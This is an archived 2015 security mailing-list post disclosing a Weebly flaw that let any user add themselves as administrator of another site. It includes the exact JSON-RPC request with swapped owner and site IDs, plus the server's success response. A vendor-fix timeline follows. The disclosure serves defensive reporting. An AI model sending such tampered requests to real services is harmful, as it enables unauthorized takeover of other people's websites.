lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 11 Apr 2015 20:04:20 GMT
Subject: Hijacking any Weebly Website [Insecure Direct Object Reference

Title: Hijack any website from by just adding an administrator to their website. [Insecure Direct Object Reference Vulnerability]


Weebly is a web-hosting service that allows the user to “drag-and-drop” while using their website builder. As of August 2012, Weebly hosts over 20 million sites with a monthly rate of over 1 million unique visitors. ‘’.


Any weebly website owner can hijack any weebly website by just inviting himself/herself through email and modifying the site ID in HTTP Request.




Here's the website details of the target:

weebly site:
owner_id: 47812623
site_id: 367503762921888574


HTTP Request:

POST /api/JsonRPC/Editor/ HTTP/1.1

{"jsonrpc":"2.0","method":"Contributor::createMultiple","params":[{"role":"admin","email":"","message":"HiJacking Weebly websites","restrict_pages":false,"owner_id":"47812623","site_id":"367503762921888574"}],"id":0}


HTTP Response:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26

{"jsonrpc":"2.0","id":0,"method":"Contributor::createMultiple","result":{"success":true,"models":[{"id":"invitation-596276730608950492","pending":true,"owner_id":"47812623","user_id":null,"site_id":"367503762921888574","email":"","last_login":false,"role":"admin","display_role":"Administrator","invitation_id":"596276730608950492","invitation_used":null,"invitation_retracted":null,"message":"HiJacking Weebly websites","restrict_pages":false,"allowed_pages":[],"allow_publish":true,"allow_stats":true,"allow_form_entries":true,"allow_blog_comments":true}],"errors":[]}}


Report Timeline:
February 22, 2015 – Bug Found by Allan Jay Dumanhug.
February 26, 2015 – Vendor Response and Vendor Fix/Patch.

Powered by blists - more mailing lists